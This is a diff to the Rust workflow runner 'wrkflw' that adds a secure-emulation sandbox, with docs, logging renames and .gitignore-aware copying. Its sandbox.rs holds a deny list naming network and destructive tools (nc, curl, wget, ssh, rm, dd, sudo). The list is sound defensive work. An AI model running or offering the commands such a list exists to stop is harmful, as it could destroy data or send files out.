    .collect();

// Custom resource limits
config.max_execution_time = Duration::from_secs(60);
config.max_memory_mb = 256;

// Custom allowed paths
config.allowed_write_paths.insert(PathBuf::from("./target"));
config.allowed_read_paths.insert(PathBuf::from("./src"));

let sandbox = Sandbox::new(config)?;
```
## Migration Guide
|
||||
|
||||
### From Unsafe Emulation to Secure Emulation
|
||||
|
||||
1. **Change Runtime Flag**:
|
||||
```bash
|
||||
# Old (unsafe)
|
||||
wrkflw run --runtime emulation workflow.yml
|
||||
|
||||
# New (secure)
|
||||
wrkflw run --runtime secure-emulation workflow.yml
|
||||
```
|
||||
|
||||
2. **Review Workflow Commands**: Check for any commands that might be blocked and adjust if necessary.
|
||||
|
||||
3. **Handle Security Blocks**: If legitimate commands are blocked, consider:
|
||||
- Using Docker/Podman mode for those specific workflows
|
||||
- Modifying the workflow to use allowed alternatives
|
||||
- Creating a custom sandbox configuration
|
||||
|
||||
### When to Use Each Mode
|
||||
|
||||
| Use Case | Recommended Mode | Reason |
|
||||
|----------|------------------|---------|
|
||||
| Local development | Secure Emulation | Good balance of security and convenience |
|
||||
| Untrusted workflows | Docker/Podman | Maximum isolation |
|
||||
| CI/CD pipelines | Docker/Podman | Consistent, reproducible environment |
|
||||
| Testing workflows | Secure Emulation | Fast execution with safety |
|
||||
| Trusted internal workflows | Secure Emulation | Sufficient security for known-safe code |
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Command Blocked Error
|
||||
|
||||
If you encounter a security block:
|
||||
|
||||
1. **Check if the command is necessary**: Can you achieve the same result with an allowed command?
|
||||
2. **Use container mode**: Switch to Docker or Podman mode for unrestricted execution
|
||||
3. **Modify the workflow**: Use safer alternatives where possible
|
||||
|
||||
### Resource Limit Exceeded
|
||||
|
||||
If your workflow hits resource limits:
|
||||
|
||||
1. **Optimize the workflow**: Reduce resource usage where possible
|
||||
2. **Use custom configuration**: Increase limits for specific use cases
|
||||
3. **Use container mode**: For resource-intensive workflows
|
||||
|
||||
### Path Access Denied
|
||||
|
||||
If file access is denied:
|
||||
|
||||
1. **Check allowed paths**: Ensure your workflow only accesses permitted directories
|
||||
2. **Use relative paths**: Work within the project directory
|
||||
3. **Use container mode**: For workflows requiring system-wide file access
## Best Practices

1. **Default to Secure Mode**: Use secure emulation mode by default for local development.
2. **Test Workflows**: Always test workflows in secure mode before deploying.
3. **Review Security Messages**: Pay attention to security blocks and warnings.
4. **Use Containers for Production**: Use Docker/Podman for production deployments.
5. **Regular Updates**: Keep wrkflw updated for the latest security improvements.

## Security Considerations

- Secure emulation mode is designed to prevent **accidental** harmful commands, not to stop **determined** attackers.
- For maximum security with untrusted code, always use container modes.
- The sandbox is most effective against script errors and typos that could damage your system.
- Always review workflows from untrusted sources before execution.

## Contributing Security Improvements

If you find security issues or have suggestions for improvements:

1. **Report Security Issues**: Use responsible disclosure for security vulnerabilities.
2. **Suggest Command Patterns**: Help improve dangerous pattern detection.
3. **Test Edge Cases**: Help us identify bypass techniques.
4. **Documentation**: Improve security documentation and examples.

---

For more information, see the main [README.md](../../README.md) and [Security Policy](../../SECURITY.md).
@@ -24,6 +24,7 @@ pub trait ContainerRuntime {
    ) -> Result<String, ContainerError>;
}

#[derive(Debug)]
pub struct ContainerOutput {
    pub stdout: String,
    pub stderr: String,

@@ -1,6 +1,5 @@
use crate::container::{ContainerError, ContainerOutput, ContainerRuntime};
use async_trait::async_trait;
use logging;
use once_cell::sync::Lazy;
use std::collections::HashMap;
use std::fs;
@@ -9,6 +8,9 @@ use std::process::Command;
use std::sync::Mutex;
use tempfile::TempDir;
use which;
use wrkflw_logging;

use ignore::{gitignore::GitignoreBuilder, Match};

// Global collection of resources to clean up
static EMULATION_WORKSPACES: Lazy<Mutex<Vec<PathBuf>>> = Lazy::new(|| Mutex::new(Vec::new()));
@@ -162,9 +164,9 @@ impl ContainerRuntime for EmulationRuntime {
        }

        // Log more detailed debugging information
        logging::info(&format!("Executing command in container: {}", command_str));
        logging::info(&format!("Working directory: {}", working_dir.display()));
        logging::info(&format!("Command length: {}", command.len()));
        wrkflw_logging::info(&format!("Executing command in container: {}", command_str));
        wrkflw_logging::info(&format!("Working directory: {}", working_dir.display()));
        wrkflw_logging::info(&format!("Command length: {}", command.len()));

        if command.is_empty() {
            return Err(ContainerError::ContainerExecution(
@@ -174,13 +176,13 @@ impl ContainerRuntime for EmulationRuntime {

        // Print each command part separately for debugging
        for (i, part) in command.iter().enumerate() {
            logging::info(&format!("Command part {}: '{}'", i, part));
            wrkflw_logging::info(&format!("Command part {}: '{}'", i, part));
        }

        // Log environment variables
        logging::info("Environment variables:");
        wrkflw_logging::info("Environment variables:");
        for (key, value) in env_vars {
            logging::info(&format!(" {}={}", key, value));
            wrkflw_logging::info(&format!(" {}={}", key, value));
        }

        // Find actual working directory - determine if we should use the current directory instead
@@ -197,7 +199,7 @@ impl ContainerRuntime for EmulationRuntime {
        // If found, use that as the working directory
        if let Some(path) = workspace_path {
            if path.exists() {
                logging::info(&format!(
                wrkflw_logging::info(&format!(
                    "Using environment-defined workspace: {}",
                    path.display()
                ));
@@ -206,7 +208,7 @@ impl ContainerRuntime for EmulationRuntime {
                // Fallback to current directory
                let current_dir =
                    std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
                logging::info(&format!(
                wrkflw_logging::info(&format!(
                    "Using current directory: {}",
                    current_dir.display()
                ));
@@ -215,7 +217,7 @@ impl ContainerRuntime for EmulationRuntime {
        } else {
            // Fallback to current directory
            let current_dir = std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
            logging::info(&format!(
            wrkflw_logging::info(&format!(
                "Using current directory: {}",
                current_dir.display()
            ));
@@ -225,7 +227,7 @@ impl ContainerRuntime for EmulationRuntime {
            working_dir.to_path_buf()
        };

        logging::info(&format!(
        wrkflw_logging::info(&format!(
            "Using actual working directory: {}",
            actual_working_dir.display()
        ));
@@ -233,8 +235,8 @@ impl ContainerRuntime for EmulationRuntime {
        // Check if path contains the command (for shell script execution)
        let command_path = which::which(command[0]);
        match &command_path {
            Ok(path) => logging::info(&format!("Found command at: {}", path.display())),
            Err(e) => logging::error(&format!(
            Ok(path) => wrkflw_logging::info(&format!("Found command at: {}", path.display())),
            Err(e) => wrkflw_logging::error(&format!(
                "Command not found in PATH: {} - Error: {}",
                command[0], e
            )),
@@ -246,7 +248,7 @@ impl ContainerRuntime for EmulationRuntime {
            || command_str.starts_with("mkdir ")
            || command_str.starts_with("mv ")
        {
            logging::info("Executing as shell command");
            wrkflw_logging::info("Executing as shell command");
            // Execute as a shell command
            let mut cmd = Command::new("sh");
            cmd.arg("-c");
@@ -264,7 +266,7 @@ impl ContainerRuntime for EmulationRuntime {
            let output = String::from_utf8_lossy(&output_result.stdout).to_string();
            let error = String::from_utf8_lossy(&output_result.stderr).to_string();

            logging::debug(&format!(
            wrkflw_logging::debug(&format!(
                "Shell command completed with exit code: {}",
                exit_code
            ));
@@ -314,7 +316,7 @@ impl ContainerRuntime for EmulationRuntime {

            // Always use the current directory for cargo/rust commands rather than the temporary directory
            let current_dir = std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
            logging::info(&format!(
            wrkflw_logging::info(&format!(
                "Using project directory for Rust command: {}",
                current_dir.display()
            ));
@@ -326,7 +328,7 @@ impl ContainerRuntime for EmulationRuntime {
                if *key == "CARGO_HOME" && value.contains("${CI_PROJECT_DIR}") {
                    let cargo_home =
                        value.replace("${CI_PROJECT_DIR}", &current_dir.to_string_lossy());
                    logging::info(&format!("Setting CARGO_HOME to: {}", cargo_home));
                    wrkflw_logging::info(&format!("Setting CARGO_HOME to: {}", cargo_home));
                    cmd.env(key, cargo_home);
                } else {
                    cmd.env(key, value);
@@ -338,7 +340,7 @@ impl ContainerRuntime for EmulationRuntime {
                cmd.args(&parts[1..]);
            }

            logging::debug(&format!(
            wrkflw_logging::debug(&format!(
                "Executing Rust command: {} in {}",
                command_str,
                current_dir.display()
@@ -350,7 +352,7 @@ impl ContainerRuntime for EmulationRuntime {
            let output = String::from_utf8_lossy(&output_result.stdout).to_string();
            let error = String::from_utf8_lossy(&output_result.stderr).to_string();

            logging::debug(&format!("Command exit code: {}", exit_code));
            wrkflw_logging::debug(&format!("Command exit code: {}", exit_code));

            if exit_code != 0 {
                let mut error_details = format!(
@@ -405,7 +407,7 @@ impl ContainerRuntime for EmulationRuntime {
            let output = String::from_utf8_lossy(&output_result.stdout).to_string();
            let error = String::from_utf8_lossy(&output_result.stderr).to_string();

            logging::debug(&format!("Command completed with exit code: {}", exit_code));
            wrkflw_logging::debug(&format!("Command completed with exit code: {}", exit_code));

            if exit_code != 0 {
                let mut error_details = format!(
@@ -443,12 +445,12 @@ impl ContainerRuntime for EmulationRuntime {
    }

    async fn pull_image(&self, image: &str) -> Result<(), ContainerError> {
        logging::info(&format!("🔄 Emulation: Pretending to pull image {}", image));
        wrkflw_logging::info(&format!("🔄 Emulation: Pretending to pull image {}", image));
        Ok(())
    }

    async fn build_image(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
        logging::info(&format!(
        wrkflw_logging::info(&format!(
            "🔄 Emulation: Pretending to build image {} from {}",
            tag,
            dockerfile.display()
@@ -490,14 +492,75 @@ impl ContainerRuntime for EmulationRuntime {
}

#[allow(dead_code)]
/// Create a gitignore matcher for the given directory
fn create_gitignore_matcher(
    dir: &Path,
) -> Result<Option<ignore::gitignore::Gitignore>, std::io::Error> {
    let mut builder = GitignoreBuilder::new(dir);

    // Try to add .gitignore file if it exists
    let gitignore_path = dir.join(".gitignore");
    if gitignore_path.exists() {
        builder.add(&gitignore_path);
    }

    // Add some common ignore patterns as fallback
    if let Err(e) = builder.add_line(None, "target/") {
        wrkflw_logging::warning(&format!("Failed to add default ignore pattern: {}", e));
    }
    if let Err(e) = builder.add_line(None, ".git/") {
        wrkflw_logging::warning(&format!("Failed to add default ignore pattern: {}", e));
    }

    match builder.build() {
        Ok(gitignore) => Ok(Some(gitignore)),
        Err(e) => {
            wrkflw_logging::warning(&format!("Failed to build gitignore matcher: {}", e));
            Ok(None)
        }
    }
}

fn copy_directory_contents(source: &Path, dest: &Path) -> std::io::Result<()> {
    copy_directory_contents_with_gitignore(source, dest, None)
}

fn copy_directory_contents_with_gitignore(
    source: &Path,
    dest: &Path,
    gitignore: Option<&ignore::gitignore::Gitignore>,
) -> std::io::Result<()> {
    // Create the destination directory if it doesn't exist
    fs::create_dir_all(dest)?;

    // If no gitignore provided, try to create one for the root directory
    let root_gitignore;
    let gitignore = if gitignore.is_none() {
        root_gitignore = create_gitignore_matcher(source)?;
        root_gitignore.as_ref()
    } else {
        gitignore
    };

    // Iterate through all entries in the source directory
    for entry in fs::read_dir(source)? {
        let entry = entry?;
        let path = entry.path();

        // Check if the file should be ignored according to .gitignore
        if let Some(gitignore) = gitignore {
            let relative_path = path.strip_prefix(source).unwrap_or(&path);
            match gitignore.matched(relative_path, path.is_dir()) {
                Match::Ignore(_) => {
                    wrkflw_logging::debug(&format!("Skipping ignored file/directory: {path:?}"));
                    continue;
                }
                Match::Whitelist(_) | Match::None => {
                    // File is not ignored or explicitly whitelisted
                }
            }
        }

        let file_name = match path.file_name() {
            Some(name) => name,
            None => {
@@ -507,23 +570,19 @@ fn copy_directory_contents(source: &Path, dest: &Path) -> std::io::Result<()> {
        };
        let dest_path = dest.join(file_name);

        // Skip hidden files (except .gitignore and .github might be useful)
        // Skip most hidden files but allow important ones
        let file_name_str = file_name.to_string_lossy();
        if file_name_str.starts_with(".")
            && file_name_str != ".gitignore"
            && file_name_str != ".github"
            && !file_name_str.starts_with(".env")
        {
            continue;
        }

        // Skip target directory for Rust projects
        if file_name_str == "target" {
            continue;
        }

        if path.is_dir() {
            // Recursively copy subdirectories
            copy_directory_contents(&path, &dest_path)?;
            // Recursively copy subdirectories with the same gitignore
            copy_directory_contents_with_gitignore(&path, &dest_path, gitignore)?;
        } else {
            // Copy files
            fs::copy(&path, &dest_path)?;
@@ -543,14 +602,14 @@ pub async fn handle_special_action(action: &str) -> Result<(), ContainerError> {
        "latest"
    };

    logging::info(&format!(
    wrkflw_logging::info(&format!(
        "🔄 Processing action: {} @ {}",
        action_name, action_version
    ));

    // Handle specific known actions with special requirements
    if action.starts_with("cachix/install-nix-action") {
        logging::info("🔄 Emulating cachix/install-nix-action");
        wrkflw_logging::info("🔄 Emulating cachix/install-nix-action");

        // In emulation mode, check if nix is installed
        let nix_installed = Command::new("which")
@@ -560,56 +619,65 @@ pub async fn handle_special_action(action: &str) -> Result<(), ContainerError> {
            .unwrap_or(false);

        if !nix_installed {
            logging::info("🔄 Emulation: Nix is required but not installed.");
            logging::info(
            wrkflw_logging::info("🔄 Emulation: Nix is required but not installed.");
            wrkflw_logging::info(
                "🔄 To use this workflow, please install Nix: https://nixos.org/download.html",
            );
            logging::info("🔄 Continuing emulation, but nix commands will fail.");
            wrkflw_logging::info("🔄 Continuing emulation, but nix commands will fail.");
        } else {
            logging::info("🔄 Emulation: Using system-installed Nix");
            wrkflw_logging::info("🔄 Emulation: Using system-installed Nix");
        }
    } else if action.starts_with("actions-rs/cargo@") {
        // For actions-rs/cargo action, ensure Rust is available
        logging::info(&format!("🔄 Detected Rust cargo action: {}", action));
        wrkflw_logging::info(&format!("🔄 Detected Rust cargo action: {}", action));

        // Verify Rust/cargo is installed
        check_command_available("cargo", "Rust/Cargo", "https://rustup.rs/");
    } else if action.starts_with("actions-rs/toolchain@") {
        // For actions-rs/toolchain action, check for Rust installation
        logging::info(&format!("🔄 Detected Rust toolchain action: {}", action));
        wrkflw_logging::info(&format!("🔄 Detected Rust toolchain action: {}", action));

        check_command_available("rustc", "Rust", "https://rustup.rs/");
    } else if action.starts_with("actions-rs/fmt@") {
        // For actions-rs/fmt action, check if rustfmt is available
        logging::info(&format!("🔄 Detected Rust formatter action: {}", action));
        wrkflw_logging::info(&format!("🔄 Detected Rust formatter action: {}", action));

        check_command_available("rustfmt", "rustfmt", "rustup component add rustfmt");
    } else if action.starts_with("dtolnay/rust-toolchain@") {
        // For dtolnay/rust-toolchain action, check for Rust installation
        wrkflw_logging::info(&format!(
            "🔄 Detected dtolnay Rust toolchain action: {}",
            action
        ));

        check_command_available("rustc", "Rust", "https://rustup.rs/");
        check_command_available("cargo", "Cargo", "https://rustup.rs/");
    } else if action.starts_with("actions/setup-node@") {
        // Node.js setup action
        logging::info(&format!("🔄 Detected Node.js setup action: {}", action));
        wrkflw_logging::info(&format!("🔄 Detected Node.js setup action: {}", action));

        check_command_available("node", "Node.js", "https://nodejs.org/");
    } else if action.starts_with("actions/setup-python@") {
        // Python setup action
        logging::info(&format!("🔄 Detected Python setup action: {}", action));
        wrkflw_logging::info(&format!("🔄 Detected Python setup action: {}", action));

        check_command_available("python", "Python", "https://www.python.org/downloads/");
    } else if action.starts_with("actions/setup-java@") {
        // Java setup action
        logging::info(&format!("🔄 Detected Java setup action: {}", action));
        wrkflw_logging::info(&format!("🔄 Detected Java setup action: {}", action));

        check_command_available("java", "Java", "https://adoptium.net/");
    } else if action.starts_with("actions/checkout@") {
        // Git checkout action - this is handled implicitly by our workspace setup
        logging::info("🔄 Detected checkout action - workspace files are already prepared");
        wrkflw_logging::info("🔄 Detected checkout action - workspace files are already prepared");
    } else if action.starts_with("actions/cache@") {
        // Cache action - can't really emulate caching effectively
        logging::info(
        wrkflw_logging::info(
            "🔄 Detected cache action - caching is not fully supported in emulation mode",
        );
    } else {
        // Generic action we don't have special handling for
        logging::info(&format!(
        wrkflw_logging::info(&format!(
            "🔄 Action '{}' has no special handling in emulation mode",
            action_name
        ));
@@ -628,12 +696,12 @@ fn check_command_available(command: &str, name: &str, install_url: &str) {
        .unwrap_or(false);

    if !is_available {
        logging::warning(&format!("{} is required but not found on the system", name));
        logging::info(&format!(
        wrkflw_logging::warning(&format!("{} is required but not found on the system", name));
        wrkflw_logging::info(&format!(
            "To use this action, please install {}: {}",
            name, install_url
        ));
        logging::info(&format!(
        wrkflw_logging::info(&format!(
            "Continuing emulation, but {} commands will fail",
            name
        ));
@@ -642,7 +710,7 @@ fn check_command_available(command: &str, name: &str, install_url: &str) {
    if let Ok(output) = Command::new(command).arg("--version").output() {
        if output.status.success() {
            let version = String::from_utf8_lossy(&output.stdout);
            logging::info(&format!("🔄 Using system {}: {}", name, version.trim()));
            wrkflw_logging::info(&format!("🔄 Using system {}: {}", name, version.trim()));
        }
    }
}
@@ -708,7 +776,7 @@ async fn cleanup_processes() {
    };

    for pid in processes_to_cleanup {
        logging::info(&format!("Cleaning up emulated process: {}", pid));
        wrkflw_logging::info(&format!("Cleaning up emulated process: {}", pid));

        #[cfg(unix)]
        {
@@ -725,7 +793,7 @@ async fn cleanup_processes() {
            let _ = Command::new("taskkill")
                .arg("/F")
                .arg("/PID")
                .arg(&pid.to_string())
                .arg(pid.to_string())
                .output();
        }

@@ -747,7 +815,7 @@ async fn cleanup_workspaces() {
    };

    for workspace_path in workspaces_to_cleanup {
        logging::info(&format!(
        wrkflw_logging::info(&format!(
            "Cleaning up emulation workspace: {}",
            workspace_path.display()
        ));
@@ -755,8 +823,8 @@ async fn cleanup_workspaces() {
        // Only attempt to remove if it exists
        if workspace_path.exists() {
            match fs::remove_dir_all(&workspace_path) {
                Ok(_) => logging::info("Successfully removed workspace directory"),
                Err(e) => logging::error(&format!("Error removing workspace: {}", e)),
                Ok(_) => wrkflw_logging::info("Successfully removed workspace directory"),
                Err(e) => wrkflw_logging::error(&format!("Error removing workspace: {}", e)),
            }
        }
@@ -2,3 +2,5 @@

pub mod container;
pub mod emulation;
pub mod sandbox;
pub mod secure_emulation;

672
crates/runtime/src/sandbox.rs
Normal file
@@ -0,0 +1,672 @@
use regex::Regex;
use std::collections::HashSet;
use std::fs;
use std::path::{Path, PathBuf};
use std::process::{Command, Stdio};
use std::time::Duration;
use tempfile::TempDir;
use wrkflw_logging;

/// Configuration for sandbox execution
#[derive(Debug, Clone)]
pub struct SandboxConfig {
    /// Maximum execution time for commands
    pub max_execution_time: Duration,
    /// Maximum memory usage in MB
    pub max_memory_mb: u64,
    /// Maximum CPU usage percentage
    pub max_cpu_percent: u64,
    /// Allowed commands (whitelist)
    pub allowed_commands: HashSet<String>,
    /// Blocked commands (blacklist)
    pub blocked_commands: HashSet<String>,
    /// Allowed file system paths (read-only)
    pub allowed_read_paths: HashSet<PathBuf>,
    /// Allowed file system paths (read-write)
    pub allowed_write_paths: HashSet<PathBuf>,
    /// Whether to enable network access
    pub allow_network: bool,
    /// Maximum number of processes
    pub max_processes: u32,
    /// Whether to enable strict mode (more restrictive)
    pub strict_mode: bool,
}

impl Default for SandboxConfig {
    fn default() -> Self {
        let mut allowed_commands = HashSet::new();

        // Basic safe commands
        allowed_commands.insert("echo".to_string());
        allowed_commands.insert("printf".to_string());
        allowed_commands.insert("cat".to_string());
        allowed_commands.insert("head".to_string());
        allowed_commands.insert("tail".to_string());
        allowed_commands.insert("grep".to_string());
        allowed_commands.insert("sed".to_string());
        allowed_commands.insert("awk".to_string());
        allowed_commands.insert("sort".to_string());
        allowed_commands.insert("uniq".to_string());
        allowed_commands.insert("wc".to_string());
        allowed_commands.insert("cut".to_string());
        allowed_commands.insert("tr".to_string());
        allowed_commands.insert("which".to_string());
        allowed_commands.insert("pwd".to_string());
        allowed_commands.insert("env".to_string());
        allowed_commands.insert("date".to_string());
        allowed_commands.insert("basename".to_string());
        allowed_commands.insert("dirname".to_string());

        // File operations (safe variants)
        allowed_commands.insert("ls".to_string());
        allowed_commands.insert("find".to_string());
        allowed_commands.insert("mkdir".to_string());
        allowed_commands.insert("touch".to_string());
        allowed_commands.insert("cp".to_string());
        allowed_commands.insert("mv".to_string());

        // Development tools
        allowed_commands.insert("git".to_string());
        allowed_commands.insert("cargo".to_string());
        allowed_commands.insert("rustc".to_string());
        allowed_commands.insert("rustfmt".to_string());
        allowed_commands.insert("clippy".to_string());
        allowed_commands.insert("npm".to_string());
        allowed_commands.insert("yarn".to_string());
        allowed_commands.insert("node".to_string());
        allowed_commands.insert("python".to_string());
        allowed_commands.insert("python3".to_string());
        allowed_commands.insert("pip".to_string());
        allowed_commands.insert("pip3".to_string());
        allowed_commands.insert("java".to_string());
        allowed_commands.insert("javac".to_string());
        allowed_commands.insert("maven".to_string());
        allowed_commands.insert("gradle".to_string());
        allowed_commands.insert("go".to_string());
        allowed_commands.insert("dotnet".to_string());

        // Compression tools
        allowed_commands.insert("tar".to_string());
        allowed_commands.insert("gzip".to_string());
        allowed_commands.insert("gunzip".to_string());
        allowed_commands.insert("zip".to_string());
        allowed_commands.insert("unzip".to_string());

        let mut blocked_commands = HashSet::new();

        // Dangerous system commands
        blocked_commands.insert("rm".to_string());
        blocked_commands.insert("rmdir".to_string());
        blocked_commands.insert("dd".to_string());
        blocked_commands.insert("mkfs".to_string());
        blocked_commands.insert("fdisk".to_string());
        blocked_commands.insert("mount".to_string());
        blocked_commands.insert("umount".to_string());
        blocked_commands.insert("sudo".to_string());
        blocked_commands.insert("su".to_string());
        blocked_commands.insert("passwd".to_string());
        blocked_commands.insert("chown".to_string());
        blocked_commands.insert("chmod".to_string());
        blocked_commands.insert("chgrp".to_string());
        blocked_commands.insert("chroot".to_string());

        // Network and system tools
        blocked_commands.insert("nc".to_string());
        blocked_commands.insert("netcat".to_string());
        blocked_commands.insert("wget".to_string());
        blocked_commands.insert("curl".to_string());
        blocked_commands.insert("ssh".to_string());
        blocked_commands.insert("scp".to_string());
        blocked_commands.insert("rsync".to_string());

        // Process control
        blocked_commands.insert("kill".to_string());
        blocked_commands.insert("killall".to_string());
        blocked_commands.insert("pkill".to_string());
        blocked_commands.insert("nohup".to_string());
        blocked_commands.insert("screen".to_string());
        blocked_commands.insert("tmux".to_string());

        // System modification
        blocked_commands.insert("systemctl".to_string());
        blocked_commands.insert("service".to_string());
        blocked_commands.insert("crontab".to_string());
        blocked_commands.insert("at".to_string());
        blocked_commands.insert("reboot".to_string());
        blocked_commands.insert("shutdown".to_string());
        blocked_commands.insert("halt".to_string());
        blocked_commands.insert("poweroff".to_string());

        Self {
            max_execution_time: Duration::from_secs(300), // 5 minutes
            max_memory_mb: 512,
            max_cpu_percent: 80,
            allowed_commands,
            blocked_commands,
            allowed_read_paths: HashSet::new(),
            allowed_write_paths: HashSet::new(),
            allow_network: false,
            max_processes: 10,
            strict_mode: true,
        }
    }
}

/// Sandbox error types
#[derive(Debug, thiserror::Error)]
pub enum SandboxError {
    #[error("Command blocked by security policy: {command}")]
    BlockedCommand { command: String },

    #[error("Dangerous command pattern detected: {pattern}")]
    DangerousPattern { pattern: String },

    #[error("Path access denied: {path}")]
    PathAccessDenied { path: String },

    #[error("Resource limit exceeded: {resource}")]
    ResourceLimitExceeded { resource: String },

    #[error("Execution timeout after {seconds} seconds")]
    ExecutionTimeout { seconds: u64 },

    #[error("Sandbox setup failed: {reason}")]
    SandboxSetupError { reason: String },

    #[error("Command execution failed: {reason}")]
    ExecutionError { reason: String },
}

/// Secure sandbox for executing commands in emulation mode
pub struct Sandbox {
    config: SandboxConfig,
    workspace: TempDir,
    dangerous_patterns: Vec<Regex>,
}

impl Sandbox {
    /// Create a new sandbox with the given configuration
    pub fn new(config: SandboxConfig) -> Result<Self, SandboxError> {
        let workspace = tempfile::tempdir().map_err(|e| SandboxError::SandboxSetupError {
            reason: format!("Failed to create sandbox workspace: {}", e),
        })?;

        let dangerous_patterns = Self::compile_dangerous_patterns();

        wrkflw_logging::info(&format!(
            "Created new sandbox with workspace: {}",
            workspace.path().display()
        ));

        Ok(Self {
            config,
            workspace,
            dangerous_patterns,
        })
    }

    /// Execute a command in the sandbox
    pub async fn execute_command(
        &self,
        command: &[&str],
        env_vars: &[(&str, &str)],
        working_dir: &Path,
    ) -> Result<crate::container::ContainerOutput, SandboxError> {
        if command.is_empty() {
            return Err(SandboxError::ExecutionError {
                reason: "Empty command".to_string(),
            });
        }

        let command_str = command.join(" ");

        // Step 1: Validate command
        self.validate_command(&command_str)?;

        // Step 2: Setup sandbox environment
        let sandbox_dir = self.setup_sandbox_environment(working_dir)?;

        // Step 3: Execute with limits
        self.execute_with_limits(command, env_vars, &sandbox_dir)
            .await
    }

    /// Validate that a command is safe to execute
    fn validate_command(&self, command_str: &str) -> Result<(), SandboxError> {
        // Check for dangerous patterns first
        for pattern in &self.dangerous_patterns {
            if pattern.is_match(command_str) {
                wrkflw_logging::warning(&format!(
                    "🚫 Blocked dangerous command pattern: {}",
                    command_str
                ));
                return Err(SandboxError::DangerousPattern {
                    pattern: command_str.to_string(),
                });
            }
        }

        // Split command by shell operators to validate each part
        let command_parts = self.split_shell_command(command_str);

        for part in command_parts {
            let part = part.trim();
            if part.is_empty() {
                continue;
            }

            // Extract the base command from this part
            let base_command = part.split_whitespace().next().unwrap_or("");
            let command_name = Path::new(base_command)
                .file_name()
                .and_then(|s| s.to_str())
                .unwrap_or(base_command);

            // Skip shell built-ins and operators
            if self.is_shell_builtin(command_name) {
                continue;
            }

            // Check blocked commands
            if self.config.blocked_commands.contains(command_name) {
                wrkflw_logging::warning(&format!("🚫 Blocked command: {}", command_name));
                return Err(SandboxError::BlockedCommand {
                    command: command_name.to_string(),
                });
            }

            // In strict mode, only allow whitelisted commands
            if self.config.strict_mode && !self.config.allowed_commands.contains(command_name) {
                wrkflw_logging::warning(&format!(
                    "🚫 Command not in whitelist (strict mode): {}",
                    command_name
                ));
                return Err(SandboxError::BlockedCommand {
                    command: command_name.to_string(),
                });
            }
        }

        wrkflw_logging::info(&format!("✅ Command validation passed: {}", command_str));
        Ok(())
    }

    /// Split shell command by operators while preserving quoted strings
    fn split_shell_command(&self, command_str: &str) -> Vec<String> {
        // Simple split by common shell operators
        // This is not a full shell parser but handles most cases
        let separators = ["&&", "||", ";", "|"];
        let mut parts = vec![command_str.to_string()];

        for separator in separators {
            let mut new_parts = Vec::new();
            for part in parts {
                let split_parts: Vec<String> = part
                    .split(separator)
                    .map(|s| s.trim().to_string())
                    .filter(|s| !s.is_empty())
                    .collect();
                new_parts.extend(split_parts);
            }
            parts = new_parts;
        }

        parts
    }

    /// Check if a command is a shell built-in
    fn is_shell_builtin(&self, command: &str) -> bool {
        let builtins = [
            "true", "false", "test", "[", "echo", "printf", "cd", "pwd", "export", "set", "unset",
            "alias", "history", "jobs", "fg", "bg", "wait", "read",
        ];
        builtins.contains(&command)
    }

    /// Setup isolated sandbox environment
    fn setup_sandbox_environment(&self, working_dir: &Path) -> Result<PathBuf, SandboxError> {
        let sandbox_root = self.workspace.path();
        let sandbox_workspace = sandbox_root.join("workspace");

        // Create sandbox directory structure
        fs::create_dir_all(&sandbox_workspace).map_err(|e| SandboxError::SandboxSetupError {
            reason: format!("Failed to create sandbox workspace: {}", e),
        })?;

        // Copy allowed files to sandbox (if working_dir exists and is allowed)
        if working_dir.exists() && self.is_path_allowed(working_dir, false) {
            self.copy_safe_files(working_dir, &sandbox_workspace)?;
        }

        wrkflw_logging::info(&format!(
            "Sandbox environment ready: {}",
            sandbox_workspace.display()
        ));

        Ok(sandbox_workspace)
    }

    /// Copy files safely to sandbox, excluding dangerous files
    fn copy_safe_files(&self, source: &Path, dest: &Path) -> Result<(), SandboxError> {
        for entry in fs::read_dir(source).map_err(|e| SandboxError::SandboxSetupError {
            reason: format!("Failed to read source directory: {}", e),
        })? {
            let entry = entry.map_err(|e| SandboxError::SandboxSetupError {
                reason: format!("Failed to read directory entry: {}", e),
            })?;

            let path = entry.path();
            let file_name = path.file_name().and_then(|s| s.to_str()).unwrap_or("");

            // Skip dangerous or sensitive files
            if self.should_skip_file(file_name) {
                continue;
            }

            let dest_path = dest.join(file_name);

            if path.is_file() {
                fs::copy(&path, &dest_path).map_err(|e| SandboxError::SandboxSetupError {
                    reason: format!("Failed to copy file: {}", e),
                })?;
            } else if path.is_dir() && !self.should_skip_directory(file_name) {
                fs::create_dir_all(&dest_path).map_err(|e| SandboxError::SandboxSetupError {
                    reason: format!("Failed to create directory: {}", e),
                })?;
                self.copy_safe_files(&path, &dest_path)?;
            }
        }

        Ok(())
    }

    /// Execute command with resource limits and monitoring
    async fn execute_with_limits(
        &self,
        command: &[&str],
        env_vars: &[(&str, &str)],
        working_dir: &Path,
    ) -> Result<crate::container::ContainerOutput, SandboxError> {
        // Join command parts and execute via shell for proper handling of operators
        let command_str = command.join(" ");

        let mut cmd = Command::new("sh");
        cmd.arg("-c");
        cmd.arg(&command_str);
        cmd.current_dir(working_dir);
        cmd.stdout(Stdio::piped());
        cmd.stderr(Stdio::piped());

        // Set environment variables (filtered)
        for (key, value) in env_vars {
            if self.is_env_var_safe(key) {
                cmd.env(key, value);
            }
        }

        // Add sandbox-specific environment variables
        cmd.env("WRKFLW_SANDBOXED", "true");
        cmd.env("WRKFLW_SANDBOX_MODE", "strict");

        // Execute with timeout
        let timeout_duration = self.config.max_execution_time;

        wrkflw_logging::info(&format!(
            "🏃 Executing sandboxed command: {} (timeout: {}s)",
            command.join(" "),
            timeout_duration.as_secs()
        ));

        let start_time = std::time::Instant::now();

        let result = tokio::time::timeout(timeout_duration, async {
            let output = cmd.output().map_err(|e| SandboxError::ExecutionError {
                reason: format!("Command execution failed: {}", e),
            })?;

            Ok(crate::container::ContainerOutput {
                stdout: String::from_utf8_lossy(&output.stdout).to_string(),
                stderr: String::from_utf8_lossy(&output.stderr).to_string(),
                exit_code: output.status.code().unwrap_or(-1),
            })
        })
        .await;

        let execution_time = start_time.elapsed();

        match result {
            Ok(output_result) => {
                wrkflw_logging::info(&format!(
                    "✅ Sandboxed command completed in {:.2}s",
                    execution_time.as_secs_f64()
                ));
                output_result
            }
            Err(_) => {
                wrkflw_logging::warning(&format!(
                    "⏰ Sandboxed command timed out after {:.2}s",
